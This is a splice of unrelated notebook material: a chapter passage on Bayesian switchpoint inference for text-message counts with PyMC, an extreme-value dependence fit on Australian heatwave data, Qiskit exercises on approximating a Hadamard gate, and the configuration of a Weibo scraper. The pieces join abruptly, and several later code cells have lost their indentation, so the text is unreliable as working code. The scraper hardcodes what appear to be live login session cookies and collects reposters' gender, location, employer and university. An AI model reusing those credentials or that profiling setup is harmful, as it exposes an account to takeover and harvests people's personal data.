We are not sure what the value of the $\lambda$ parameter really is, however. Looking at the chart above, it appears that the rate might become higher late in the observation period, which is equivalent to saying that $\lambda$ increases at some point during the observations. (Recall that a higher value of $\lambda$ assigns more probability to larger outcomes. That is, there is a higher probability of many text messages having been sent on a given day.)
How can we represent this observation mathematically? Let's assume that on some day during the observation period (call it $\tau$), the parameter $\lambda$ suddenly jumps to a higher value. So we really have two $\lambda$ parameters: one for the period before $\tau$, and one for the rest of the observation period. In the literature, a sudden transition like this would be called a *switchpoint*:
$$
\lambda =
\begin{cases}
\lambda_1 & \text{if } t \lt \tau \cr
\lambda_2 & \text{if } t \ge \tau
\end{cases}
$$
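The piecewise rate above can be sketched in plain NumPy (a toy sketch with made-up numbers; the PyMC model comes later):

```python
import numpy as np

def switchpoint_rate(n_days, lambda_1, lambda_2, tau):
    """Rate for each day: lambda_1 before day tau, lambda_2 from tau onward."""
    lam = np.full(n_days, lambda_1)
    lam[tau:] = lambda_2
    return lam

print(switchpoint_rate(7, 18.0, 23.0, tau=4))
# [18. 18. 18. 18. 23. 23. 23.]
```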
If, in reality, no sudden change occurred and indeed $\lambda_1 = \lambda_2$, then the posterior distributions of the two $\lambda$s should look about equal.
We are interested in inferring the unknown $\lambda$s. To use Bayesian inference, we need to assign prior probabilities to the different possible values of $\lambda$. What would be good prior probability distributions for $\lambda_1$ and $\lambda_2$? Recall that $\lambda$ can be any positive number. As we saw earlier, the *exponential* distribution provides a continuous density function for positive numbers, so it might be a good choice for modeling $\lambda_i$. But recall that the exponential distribution takes a parameter of its own, so we'll need to include that parameter in our model. Let's call that parameter $\alpha$.
\begin{align}
&\lambda_1 \sim \text{Exp}( \alpha ) \\\
&\lambda_2 \sim \text{Exp}( \alpha )
\end{align}
$\alpha$ is called a *hyper-parameter* or *parent variable*. In literal terms, it is a parameter that influences other parameters. Our initial guess at $\alpha$ does not influence the model too strongly, so we have some flexibility in our choice. A good rule of thumb is to set the exponential parameter equal to the inverse of the average of the count data. Since we're modeling $\lambda$ using an exponential distribution, we can use the expected value identity shown earlier to get:
$$\frac{1}{N}\sum_{i=0}^N \;C_i \approx E[\; \lambda \; |\; \alpha ] = \frac{1}{\alpha}$$
An alternative, and something I encourage the reader to try, would be to have two priors: one for each $\lambda_i$. Creating two exponential distributions with different $\alpha$ values reflects our prior belief that the rate changed at some point during the observations.
What about $\tau$? Because of the noisiness of the data, it's difficult to pick out a priori when $\tau$ might have occurred. Instead, we can assign a *uniform prior belief* to every possible day. This is equivalent to saying
\begin{align}
& \tau \sim \text{DiscreteUniform(1,70) }\\\\
& \Rightarrow P( \tau = k ) = \frac{1}{70}
\end{align}
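This uniform prior can be sanity-checked with scipy (my own check; `randint` is uniform on the half-open interval `[low, high)`):

```python
import scipy.stats as stats

# Days 1..70, so high must be 71 (exclusive)
tau_prior = stats.randint(1, 71)
print(tau_prior.pmf(45))  # 1/70, the same for every day in range
```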
So after all this, what does our overall prior distribution for the unknown variables look like? Frankly, *it doesn't matter*. What we should understand is that it's an ugly, complicated mess involving symbols only a mathematician could love. And things will only get uglier the more complicated our models become. Regardless, all we really care about is the posterior distribution.
We next turn to PyMC, a Python library for performing Bayesian analysis that is undaunted by the mathematical monster we have created.
Introducing our first hammer: PyMC
-----
PyMC is a Python library for programming Bayesian analysis [3]. It is a fast, well-maintained library. The only unfortunate part is that its documentation is lacking in certain areas, especially those that bridge the gap between beginner and hacker. One of this book's main goals is to solve that problem, and also to demonstrate why PyMC is so cool.
We will model the problem above using PyMC. This type of programming is called *probabilistic programming*, an unfortunate misnomer that invokes ideas of randomly-generated code and has likely confused and frightened users away from this field. The code is not random; it is probabilistic in the sense that we create probability models using programming variables as the model's components. Model components are first-class primitives within the PyMC framework.
B. Cronin [5] has a very motivating description of probabilistic programming:
> Another way of thinking about this: unlike a traditional program, which only runs in the forward directions, a probabilistic program is run in both the forward and backward direction. It runs forward to compute the consequences of the assumptions it contains about the world (i.e., the model space it represents), but it also runs backward from the data to constrain the possible explanations. In practice, many probabilistic programming systems will cleverly interleave these forward and backward operations to efficiently home in on the best explanations.
Because of the confusion engendered by the term *probabilistic programming*, I'll refrain from using it. Instead, I'll simply say *programming*, since that's what it really is.
PyMC code is easy to read. The only novel thing should be the syntax, and I will interrupt the code to explain individual sections. Simply remember that we are representing the model's components ($\tau, \lambda_1, \lambda_2$ ) as variables:
```
import pymc as pm

alpha = 1.0 / count_data.mean()  # Recall count_data is the
                                 # variable that holds our txt counts
lambda_1 = pm.Exponential("lambda_1", alpha)
lambda_2 = pm.Exponential("lambda_2", alpha)

tau = pm.DiscreteUniform("tau", lower=0, upper=n_count_data)
```
In the code above, we create the PyMC variables corresponding to $\lambda_1$ and $\lambda_2$. We assign them to PyMC's *stochastic variables*, so-called because they are treated by the back end as random number generators. We can demonstrate this fact by calling their built-in `random()` methods.
```
print("Random output:", tau.random(), tau.random(), tau.random())

@pm.deterministic
def lambda_(tau=tau, lambda_1=lambda_1, lambda_2=lambda_2):
    out = np.zeros(n_count_data)
    out[:tau] = lambda_1  # lambda before tau is lambda_1
    out[tau:] = lambda_2  # lambda after (and including) tau is lambda_2
    return out
```
This code creates a new function `lambda_`, but really we can think of it as a random variable: the random variable $\lambda$ from above. Note that because `lambda_1`, `lambda_2` and `tau` are random, `lambda_` will be random. We are **not** fixing any variables yet.
`@pm.deterministic` is a decorator that tells PyMC this is a deterministic function. That is, if the arguments were deterministic (which they are not), the output would be deterministic as well. Deterministic functions will be covered in Chapter 2.
```
observation = pm.Poisson("obs", lambda_, value=count_data, observed=True)
model = pm.Model([observation, lambda_1, lambda_2, tau])
```
The variable `observation` combines our data, `count_data`, with our proposed data-generation scheme, given by the variable `lambda_`, through the `value` keyword. We also set `observed = True` to tell PyMC that this should stay fixed in our analysis. Finally, PyMC wants us to collect all the variables of interest and create a `Model` instance out of them. This makes our life easier when we retrieve the results.
The code below will be explained in Chapter 3, but I show it here so you can see where our results come from. One can think of it as a *learning* step. The machinery being employed is called *Markov Chain Monte Carlo* (MCMC), which I also delay explaining until Chapter 3. This technique returns thousands of random variables from the posterior distributions of $\lambda_1, \lambda_2$ and $\tau$. We can plot a histogram of the random variables to see what the posterior distributions look like. Below, we collect the samples (called *traces* in the MCMC literature) into histograms.
```
# Mysterious code to be explained in Chapter 3.
mcmc = pm.MCMC(model)
mcmc.sample(40000, 10000, 1)

lambda_1_samples = mcmc.trace('lambda_1')[:]
lambda_2_samples = mcmc.trace('lambda_2')[:]
tau_samples = mcmc.trace('tau')[:]

figsize(12.5, 10)

# histogram of the samples:
ax = plt.subplot(311)
ax.set_autoscaley_on(False)
plt.hist(lambda_1_samples, histtype='stepfilled', bins=30, alpha=0.85,
         label="posterior of $\lambda_1$", color="#A60628", normed=True)
plt.legend(loc="upper left")
plt.title(r"""Posterior distributions of the variables
    $\lambda_1,\;\lambda_2,\;\tau$""")
plt.xlim([15, 30])
plt.xlabel("$\lambda_1$ value")

ax = plt.subplot(312)
ax.set_autoscaley_on(False)
plt.hist(lambda_2_samples, histtype='stepfilled', bins=30, alpha=0.85,
         label="posterior of $\lambda_2$", color="#7A68A6", normed=True)
plt.legend(loc="upper left")
plt.xlim([15, 30])
plt.xlabel("$\lambda_2$ value")

plt.subplot(313)
w = 1.0 / tau_samples.shape[0] * np.ones_like(tau_samples)
plt.hist(tau_samples, bins=n_count_data, alpha=1,
         label=r"posterior of $\tau$",
         color="#467821", weights=w, rwidth=2.)
plt.xticks(np.arange(n_count_data))
plt.legend(loc="upper left")
plt.ylim([0, .75])
plt.xlim([35, len(count_data) - 20])
plt.xlabel(r"$\tau$ (in days)")
plt.ylabel("probability");
```
### Interpretation
Recall that Bayesian methodology returns a *distribution*. Hence we now have distributions to describe the unknown $\lambda$s and $\tau$. What have we gained? Immediately, we can see the uncertainty in our estimates: the wider the distribution, the less certain our posterior belief should be. We can also see what the plausible values for the parameters are: $\lambda_1$ is around 18 and $\lambda_2$ is around 23. The posterior distributions of the two $\lambda$s are clearly distinct, indicating that it is indeed likely that there was a change in the user's text-message behaviour.
What other observations can you make? If you look at the original data again, do these results seem reasonable?
Notice also that the posterior distributions for the $\lambda$s do not look like exponential distributions, even though our priors for these variables were exponential. In fact, the posterior distributions are not really of any form that we recognize from the original model. But that's OK! This is one of the benefits of taking a computational point of view. If we had instead done this analysis using mathematical approaches, we would have been stuck with an analytically intractable (and messy) distribution. Our use of a computational approach makes us indifferent to mathematical tractability.
Our analysis also returned a distribution for $\tau$. Its posterior distribution looks a little different from the other two because it is a discrete random variable, so it doesn't assign probabilities to intervals. We can see that near day 45, there was a 50% chance that the user's behaviour changed. Had no change occurred, or had the change been gradual over time, the posterior distribution of $\tau$ would have been more spread out, reflecting that many days were plausible candidates for $\tau$. By contrast, in the actual results we see that only three or four days make any sense as potential transition points.
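Because $\tau$ is discrete, its posterior probabilities can be read off directly by counting trace samples. A sketch with a *hypothetical* trace standing in for `mcmc.trace('tau')[:]`:

```python
import numpy as np

rng = np.random.default_rng(1)
# Hypothetical stand-in for the real tau trace: three plausible days,
# with day 45 carrying about half the posterior mass.
tau_samples = rng.choice([44, 45, 46], size=10_000, p=[0.25, 0.5, 0.25])

# Empirical posterior probability P(tau = k) for each day k:
posterior_tau = np.bincount(tau_samples, minlength=70) / len(tau_samples)
print(posterior_tau[45])  # roughly 0.5
```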
### Why would I want samples from the posterior, anyways?
We will deal with this question for the remainder of the book, and it is an understatement to say that it will lead us to some amazing results. For now, let's end this chapter with one more example.
We'll use the posterior samples to answer the following question: what is the expected number of texts at day $t, \; 0 \le t \le 70$ ? Recall that the expected value of a Poisson variable is equal to its parameter $\lambda$. Therefore, the question is equivalent to *what is the expected value of $\lambda$ at time $t$*?
In the code below, let $i$ index samples from the posterior distributions. Given a day $t$, we average over all possible $\lambda_i$ for that day $t$, using $\lambda_i = \lambda_{1,i}$ if $t \lt \tau_i$ (that is, if the behaviour change has not yet occurred), else we use $\lambda_i = \lambda_{2,i}$.
```
figsize(12.5, 5)
# tau_samples, lambda_1_samples, lambda_2_samples contain
# N samples from the corresponding posterior distribution
N = tau_samples.shape[0]
expected_texts_per_day = np.zeros(n_count_data)
for day in range(0, n_count_data):
    # ix is a bool index of all tau samples corresponding to
    # the switchpoint occurring prior to value of 'day'
    ix = day < tau_samples
    # Each posterior sample corresponds to a value for tau.
    # For each day, that value of tau indicates whether we're "before"
    # (in the lambda_1 "regime") or
    # "after" (in the lambda_2 "regime") the switchpoint.
    # By taking the posterior sample of lambda_1/2 accordingly, we can average
    # over all samples to get an expected value for lambda on that day.
    # As explained, the "message count" random variable is Poisson distributed,
    # and therefore lambda (the Poisson parameter) is the expected value of
    # "message count".
    expected_texts_per_day[day] = (lambda_1_samples[ix].sum()
                                   + lambda_2_samples[~ix].sum()) / N

plt.plot(range(n_count_data), expected_texts_per_day, lw=4, color="#E24A33",
         label="expected number of text-messages received")
plt.xlim(0, n_count_data)
plt.xlabel("Day")
plt.ylabel("Expected # text-messages")
plt.title("Expected number of text-messages received")
plt.ylim(0, 60)
plt.bar(np.arange(len(count_data)), count_data, color="#348ABD", alpha=0.65,
        label="observed texts per day")
plt.legend(loc="upper left");
```
Our analysis shows strong support for believing the user's behavior did change ($\lambda_1$ would have been close in value to $\lambda_2$ had this not been true), and that the change was sudden rather than gradual (as demonstrated by $\tau$'s strongly peaked posterior distribution). We can speculate what might have caused this: a cheaper text-message rate, a recent weather-to-text subscription, or perhaps a new relationship. (In fact, the 45th day corresponds to Christmas, and I moved away to Toronto the next month, leaving a girlfriend behind.)
##### Exercises
1\. Using `lambda_1_samples` and `lambda_2_samples`, what is the mean of the posterior distributions of $\lambda_1$ and $\lambda_2$?
```
print(lambda_1_samples.mean())
print(lambda_2_samples.mean())
```
2\. What is the expected percentage increase in text-message rates? `hint:` compute the mean of `lambda_1_samples/lambda_2_samples`. Note that this quantity is very different from `lambda_1_samples.mean()/lambda_2_samples.mean()`.
```
print(lambda_1_samples.mean()/lambda_2_samples.mean())
print((lambda_1_samples/lambda_2_samples).mean())
```
3\. What is the mean of $\lambda_1$ **given** that we know $\tau$ is less than 45. That is, suppose we have been given new information that the change in behaviour occurred prior to day 45. What is the expected value of $\lambda_1$ now? (You do not need to redo the PyMC part. Just consider all instances where `tau_samples < 45`.)
```
y = np.bincount(tau_samples)
print(y)
ii = np.nonzero(y)[0]
print(list(zip(ii, y[ii])))
ix = tau_samples < 45
print(ix)
print(ix.sum())
print(len(ix))
lambda_1_samples[ix].mean()
```
### References
- [1] Gelman, Andrew. N.p.. Web. 22 Jan 2013. [N is never large enough](http://andrewgelman.com/2005/07/31/n_is_never_larg/).
- [2] Norvig, Peter. 2009. [The Unreasonable Effectiveness of Data](http://static.googleusercontent.com/media/research.google.com/en//pubs/archive/35179.pdf).
- [3] Patil, A., D. Huard and C.J. Fonnesbeck. 2010.
PyMC: Bayesian Stochastic Modelling in Python. Journal of Statistical
Software, 35(4), pp. 1-81.
- [4] Jimmy Lin and Alek Kolcz. Large-Scale Machine Learning at Twitter. Proceedings of the 2012 ACM SIGMOD International Conference on Management of Data (SIGMOD 2012), pages 793-804, May 2012, Scottsdale, Arizona.
- [5] Cronin, Beau. "Why Probabilistic Programming Matters." 24 Mar 2013. Google, Online Posting to Google . Web. 24 Mar. 2013. <https://plus.google.com/u/0/107971134877020469960/posts/KpeRdJKR6Z1>.
```
from IPython.core.display import HTML
def css_styling():
styles = open("../styles/custom.css", "r").read()
return HTML(styles)
css_styling()
```
```
import numpy as np
from scipy.stats import laplace
from scipy.optimize import minimize
import matplotlib.pyplot as plt
%matplotlib inline
from Master_Functions import CondExtBivNegLogLik
from DeltaLaplaceFuncs import DeltaLaplace
# For module development
%load_ext autoreload
%autoreload 2
print('\n'.join(f'{m.__name__} {m.__version__}' for m in globals().values() if getattr(m, '__version__', None)))
# Create toy data. We require X to be Laplace.
X = laplace(0,1).rvs(5000)
#We'll also let Z be Delta_Laplace noise
#Condition on X being larger than some high quantile u
u = np.quantile(X,0.95)
X = X[X>u]
Z = DeltaLaplace(loc =0.1,scale = 0.3,shape = 1).rvs(size=len(X), random_state = 2)
Y = 0.2 * X + Z*(X**0.8)
fig=plt.figure()
plt.scatter(X,Y)
plt.xlabel("X")
plt.ylabel("Y")
plt.show()
## Fit distribution. We will use Delta-Laplace margins. If use_DL = False, Gaussian margins are used for the residual.
init_par=[0.5,0.2,0.2,0.5,2]
X_data, Y_data = X,Y
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
fit
#Plot fit
from Master_Functions import plot_bivariate_condExt_fit
#This can be done using either the empirical residual quantiles or the parametric delta-Laplace quantiles. Choose between
#plot_type = ("Model","Empirical","Both")
#Other inputs:
#X,Y data for fitting - can be unconditioned
#u - Threshold for conditional quantile Y| X > u. Should be greater than or equal to that used for fitting
#par_ests - parameter estimates. Only supports (alpha, beta, mu, sigma) or (alpha, beta, mu, sigma, delta)
#zoom - If True, plots only (X,Y)| X>u. Plots all data, otherwise.
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19),
plot_type = "Both", zoom = True)
```
# Using real data - Australian summer heatwaves (Wadsworth and Tawn, 2019)
```
import pandas as pd
df=pd.read_csv("data/Aus_Temp_Values.csv", index_col=[0])
coords=pd.read_csv("data/Aus_Temp_Coordinates.csv", index_col=[0])
print(df.shape)
df.head()
##5324 observations, Summer only (DJF), 1957-2014
##There are 72 observation locations, (lat,lon) coordinates given in coords
print(coords.shape)
coords.head()
n_locs = coords.shape[0]
```
Data has already undergone site-wise marginal transformation to standard Laplace and so no pre-processing is required.
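The transformation itself is not part of this notebook, but for completeness, a site-wise empirical transform to standard Laplace margins can be sketched as follows (a rank-based probability integral transform; the function name is illustrative, not from the repository's modules):

```python
import numpy as np
from scipy.stats import laplace, rankdata

def to_laplace_margins(x):
    # empirical probability integral transform: ranks -> (0, 1) -> Laplace quantiles
    u = rankdata(x) / (len(x) + 1)
    return laplace.ppf(u)

# illustrative use on skewed synthetic data
rng = np.random.default_rng(1)
raw = rng.gamma(shape=2.0, size=1000)
lap = to_laplace_margins(raw)
```

The transform is rank-preserving, so the dependence structure between sites is unchanged while each margin becomes approximately standard Laplace.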
```
#For a single-pair of sites
Cond_site_ind, Dep_site_ind = 2,3
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
#Condition on X > u. We take u to be the 90% quantile.
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
fig , axs = plt.subplots(1,2, figsize=(9, 4))
axs[0].scatter(X,Y, alpha = 0.5)
axs[1].scatter(X_data,Y_data, alpha = 0.5)
axs[0].set(xlabel="X", ylabel="Y")
axs[1].set(xlabel="X", ylabel="Y")
axs[0].set_title("(X,Y)")
axs[1].set_title("(X,Y)| X > %.1f" %u)
plt.show()
## Fit the bivariate Heffernan and Tawn model, using Delta-Laplace margins.
init_par=[0.5,0.6,0.2,0.2,1]
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
fit.x
#Plot fit
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19),
plot_type = "Both", zoom = False)
# Fit with less dependence
Cond_site_ind, Dep_site_ind = 0,71
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
init_par=[0.3,0.6,0.2,0.2,1]
use_DL = True
fit = minimize(fun = CondExtBivNegLogLik,x0 = init_par,
args=(X_data,Y_data,use_DL),
method="Nelder-Mead")
fit = minimize(fun = CondExtBivNegLogLik,x0 = fit.x,
args=(X_data,Y_data,use_DL),
method="BFGS")
u=min(X_data)
plot_bivariate_condExt_fit(X = X,Y = Y,u = u, par_ests = fit.x, probs = np.linspace(0.05,0.95,19), plot_type = "Both", zoom = True)
print(fit.x)
#Small alpha and beta, so very low dependence. We would expect Y| X > u to be approximately standard Laplace.
from scipy.stats import laplace
dist=laplace()
plt.hist(Y_data, 50, density = True)
plt.title('Y| X > u')
probs=dist.pdf(np.linspace(-8,8,100))
plt.plot(np.linspace(-8,8,100),probs)
plt.show()
#And for the highly dependent pair?
Cond_site_ind, Dep_site_ind = 2,3
X = df.iloc[:,Cond_site_ind]
Y = df.iloc[:,Dep_site_ind]
u = np.quantile(X, 0.9)
X_data = X[X > u]
Y_data = Y[X > u]
plt.hist(Y_data, 50, density = True)
plt.title('Y| X > u')
probs=dist.pdf(np.linspace(-8,8,100))
plt.plot(np.linspace(-8,8,100),probs)
plt.show()
```
# Basic Synthesis of Single-Qubit Gates
```
from qiskit import *
from qiskit.tools.visualization import plot_histogram
%config InlineBackend.figure_format = 'svg' # Makes the images look nice
import numpy as np
```
## 1
Show that the Hadamard gate can be written in the following two forms
$$H = \frac{X+Z}{\sqrt{2}} \equiv \exp\left(i \frac{\pi}{2} \, \frac{X+Z}{\sqrt{2}}\right).$$
Here $\equiv$ is used to denote that the equality is valid up to a global phase, and hence that the resulting gates are physically equivalent.
Hint: it might even be easiest to prove that $e^{i\frac{\pi}{2} M} \equiv M$ for any matrix whose eigenvalues are all $\pm 1$, and that such matrices are exactly those satisfying $M^2=I$.
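A quick numerical check of both identities (a sketch using NumPy; the matrix exponential is evaluated through the eigendecomposition, which is valid because $H$ is Hermitian):

```python
import numpy as np

X = np.array([[0, 1], [1, 0]], dtype=complex)
Z = np.array([[1, 0], [0, -1]], dtype=complex)
H = (X + Z) / np.sqrt(2)

# H is Hermitian with eigenvalues +1 and -1, hence H^2 = I
assert np.allclose(H @ H, np.eye(2))

# evaluate exp(i*pi/2*H) via the eigendecomposition of H
w, V = np.linalg.eigh(H)
exp_iH = V @ np.diag(np.exp(1j * np.pi / 2 * w)) @ V.conj().T

# exp(i*pi/2*H) equals i*H: the same gate as H, up to the global phase i
print(np.allclose(exp_iH, 1j * H))  # prints True
```

Since the eigenvalues are $\pm 1$, the exponential acts as $e^{\pm i\pi/2} = \pm i = i \cdot (\pm 1)$ on each eigenspace, which is exactly multiplication by $iH$.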
## 2
The Hadamard can be constructed from `rx` and `rz` operations as
$$ R_x(\theta) = e^{i\frac{\theta}{2} X}, ~~~ R_z(\theta) = e^{i\frac{\theta}{2} Z},\\ H \equiv \lim_{n\rightarrow\infty} \left( ~R_x\left(\frac{\theta}{n}\right) ~~R_z \left(\frac{\theta}{n}\right) ~\right)^n.$$
Here $\theta$ must be suitably chosen. When implemented for finite $n$, the resulting gate is an approximation to the Hadamard whose error decreases with $n$.
The following shows an example of this implemented with Qiskit with an incorrectly chosen value of $\theta$ (and with the global phase ignored).
* Determine the correct value of $\theta$.
* Show that the error (when using the correct value of $\theta$) decreases quadratically with $n$.
```
q = QuantumRegister(1)
c = ClassicalRegister(1)
error = {}
for n in range(1,11):
# Create a blank circuit
qc = QuantumCircuit(q,c)
# Implement an approximate Hadamard
theta = np.pi # here we incorrectly choose theta=pi
for j in range(n):
qc.rx(theta/n,q[0])
qc.rz(theta/n,q[0])
# We need to measure how good the above approximation is. Here's a simple way to do this.
# Step 1: Use a real hadamard to cancel the above approximation.
    # For a good approximation, the qubit will return to state 0. For a bad one, it will end up in some superposition.
qc.h(q[0])
# Step 2: Run the circuit, and see how many times we get the outcome 1.
# Since it should return 0 with certainty, the fraction of 1s is a measure of the error.
qc.measure(q,c)
shots = 20000
job = execute(qc, Aer.get_backend('qasm_simulator'),shots=shots)
try:
error[n] = (job.result().get_counts()['1']/shots)
    except KeyError:
        pass  # no '1' outcomes were observed for this n
plot_histogram(error)
```
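The same experiment can also be run classically with small matrices. The sketch below uses the convention $R_x(\theta)=e^{i\theta X/2}$ from above (note this differs from Qiskit's sign convention) and takes $\theta=\pi/\sqrt{2}$, the value suggested by the identity in part 1, since $e^{i\frac{\pi}{2}\frac{X+Z}{\sqrt{2}}} = e^{i\frac{\theta}{2}(X+Z)}$ when $\theta = \pi/\sqrt{2}$. The outcome-1 probability then falls off roughly as $1/n^2$:

```python
import numpy as np

I2 = np.eye(2, dtype=complex)
X = np.array([[0, 1], [1, 0]], dtype=complex)
Z = np.array([[1, 0], [0, -1]], dtype=complex)
H = (X + Z) / np.sqrt(2)

def rot(P, phi):
    # e^{i*phi*P/2} for a matrix P with P^2 = I (the convention used in the text)
    return np.cos(phi / 2) * I2 + 1j * np.sin(phi / 2) * P

def error_prob(n, theta):
    # probability of outcome 1 after the approximate H followed by an exact H
    step = rot(Z, theta / n) @ rot(X, theta / n)   # rx then rz, as in the circuit
    U = np.linalg.matrix_power(step, n)
    amp = (H @ U)[1, 0]                            # <1| H U |0>
    return abs(amp) ** 2

theta = np.pi / np.sqrt(2)
errs = {n: error_prob(n, theta) for n in (5, 10, 20, 40)}
for n, e in errs.items():
    print(n, e)
# doubling n cuts the error by roughly a factor of 4 (quadratic scaling)
```

This removes the shot noise of the simulator, so the $1/n^2$ trend is visible even at small $n$.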
## 3
An improved version of the approximation can be found from,
$$H \equiv \lim_{n\rightarrow\infty} \left( ~ R_z \left(\frac{\theta}{2n}\right)~~ R_x\left(\frac{\theta}{n}\right) ~~ R_z \left(\frac{\theta}{2n}\right) ~\right)^n.$$
Implement this, and investigate the scaling of the error.
```
import qiskit
qiskit.__qiskit_version__
```
## Libraries
```
import os
import csv
import requests
import xlwt
import re
import json
import time
```
### Configuration
```
#Edit according to your own browser's information
headers = {
'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Mobile Safari/537.36'
,
'Cookie': '_T_WM=67706607048; WEIBOCN_FROM=1110006030; ALF=1582777481; SCF=AqQddu0eGCw6Wh1xPsTyigWBFJH-P0ACsyLUFzNakys5tF6kBCjVpv4O6BDEGM4gShv5JHfuyjMoLBKfT5-Xwsc.; SUB=_2A25zK8jDDeRhGeNP41UT9yjIyj6IHXVQ1-iLrDV6PUJbktAKLUHSkW1NTk4PgJoxaitdQXaQL6znAIMdvJJs4-5l; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5q.Hx0pIs7PKpACzdnFYSZ5JpX5K-hUgL.Fo-p1hMES0qXeKz2dJLoIpUeBc8EdFH8SC-4BbHFSFH81F-RSF-4Sntt; SUHB=0qjEKc2Va_YMLH; SSOLoginState=1580185747; MLOGIN=1; XSRF-TOKEN=607e98; M_WEIBOCN_PARAMS=luicode%3D10000011%26lfid%3D2304135671786192_-_WEIBO_SECOND_PROFILE_WEIBO%26fid%3D2304135671786192_-_WEIBO_SECOND_PROFILE_WEIBO%26uicode%3D10000011'
#'ALF=1581501545; _T_WM=67706607048; H5_wentry=H5; backURL=https%3A%2F%2Fm.weibo.cn%2Fapi%2Fcomments%2Fshow%3Fid%3DIr5j4iRXW%26page%3D3; XSRF-TOKEN=11216a; WEIBOCN_FROM=1110006030; MLOGIN=1; SSOLoginState=1580006602; SCF=AqQddu0eGCw6Wh1xPsTyigWBFJH-P0ACsyLUFzNakys5zFt06rZeA1gEI0iP7HfWxZntbpMr8WTWhrxEdSVGB58.; SUB=_2A25zKIyaDeRhGeNP41UT9yjIyj6IHXVQ0hTSrDV6PUJbktAKLRL-kW1NTk4PgHLYgtoeuxFzuGDIDcybzoEoXvq9; SUBP=0033WrSXqPxfM725Ws9jqgMF55529P9D9W5q.Hx0pIs7PKpACzdnFYSZ5JpX5KzhUgL.Fo-p1hMES0qXeKz2dJLoIpUeBc8EdFH8SC-4BbHFSFH81F-RSF-4Sntt; SUHB=0IIlrfWMMkVsTI; M_WEIBOCN_PARAMS=uicode%3D20000174'
}
#File save path
addrRoot='C:/Users/cascara/Desktop/seedcup/csv/blog/'
#Whether to fetch detailed profile information for reposters
getConcreteInfoList=True
isLogin=True
#Whether to log in when collecting personal information
#String printed when no information exists
infoNoExistStr='未知'
#Whether to clean the Weibo post text
processText = True
```
### Build the tables and choose which data to collect (edit here to select the fields you want)
```
#Profile fields to collect and their column order
infoRangeDict={
'性别':True,
'所在地':True,
'生日':False,
'家乡':False,
'公司':True,
'大学':True,
'昵称':False,
'简介':False,
'注册时间':False,
'阳光信用':False,
    #Shown when the information is missing
'infoNoExist':'未知'
}
```
```
#Post (blog) fields to collect and their column order
blogRangeDict={
'visible': False,#{type: 0, list_id: 0}
'created_at': True,#"20分钟前"
'id': False,#"4466073829119710"
'idstr': False,#"4466073829119710"
'mid': False,#"4466073829119710"
'can_edit': False,#false
'show_additional_indication': False,#0
'text': True,#"【情况通报】2019年12月31日,武汉市卫健部门发布关于肺炎疫情的情况通报。
'textLength': False,#452
'source': False,#"360安全浏览器"
'favorited': False,#false
'pic_types': False,#""
'is_paid': False,#false
'mblog_vip_type': False,#0
'user': False,#{id: 2418542712, screen_name: "平安武汉",…}
'reposts_count': True,#1035
'comments_count': True,#1886
'attitudes_count': True,#7508
'pending_approval_count': False,#0
'isLongText': False,#true
'reward_exhibition_type':False,# 0
'hide_flag': False,#0
'mblogtype': False,#0
'more_info_type': False,#0
'cardid': False,#"star_11247_common"
'content_auth': False,#0
'pic_num': False,#0
    #Shown when the corresponding information is missing:
'infoNoExist':'未知'
}
```
```
#Poster (user) fields to collect and their column order
userRangeDict={
'id':True,# 1323527941
'screen_name': True,#"Vista看天下"
'profile_image_url': False,#"https://tva2.sinaimg.cn/crop.0.0.180.180.180/4ee36f05jw1e8qgp5bmzyj2050050aa8.jpg?KID=imgbed,tva&Expires=1580290462&ssig=xPIoKDRR56"
'profile_url':False,# "https://m.weibo.cn/u/1323527941?uid=1323527941&luicode=10000011&lfid=1076031323527941"
    'statuses_count': False,#number of Weibo posts, 77256
'verified': False,#true
'verified_type':False,# 3
'verified_type_ext': False,#0
'verified_reason': False,#"《Vista看天下》官方微博"
'close_blue_v': False,#false
'description': True,#"一个有趣的蓝V"
'gender': True,# "m"
'mbtype': False,#12
'urank': False,#48
'mbrank': False,#6
'follow_me':False,# false
'following':False,# false
'followers_count': True,#19657897
'follow_count': True,#1809
'cover_image_phone': False,#"https://tva1.sinaimg.cn/crop.0.0.640.640.640/549d0121tw1egm1kjly3jj20hs0hsq4f.jpg"
'avatar_hd': False,#"https://ww2.sinaimg.cn/orj480/4ee36f05jw1e8qgp5bmzyj2050050aa8.jpg"
'like': False,#false
'like_me': False,#false
'badge': False,#{enterprise: 1, gongyi_level: 1, bind_taobao: 1, dzwbqlx_2016: 1, follow_whitelist_video: 1,…}
    #Shown when the information is missing
'infoNoExist':'未知'
}
```
### File naming
```
def addrFile(tweeter,suffix):
path=addrRoot+str(tweeter)+'/'
if os.path.exists(path) is False:
os.makedirs(path)
address=path+tweeter+suffix+'.csv'
return address
```
### Generate the information headers
```
def getInfoTitle(Dict,prefix):
titleList=[]
for item in Dict:
if(Dict.get(item) is True):
titleList.append(prefix+item)
return (titleList)
```
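For example (the function is restated here so the snippet runs on its own), the profile dictionary above would produce prefixed headers like this:

```python
def getInfoTitle(Dict, prefix):
    # same logic as the cell above: keep keys flagged True, prefixed, in dict order
    titleList = []
    for item in Dict:
        if Dict.get(item) is True:
            titleList.append(prefix + item)
    return titleList

infoRangeDict = {'性别': True, '所在地': True, '生日': False, 'infoNoExist': '未知'}
print(getInfoTitle(infoRangeDict, '转发'))  # ['转发性别', '转发所在地']
```

Note that the `'infoNoExist'` entry is skipped automatically because its value is a string, not `True`.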
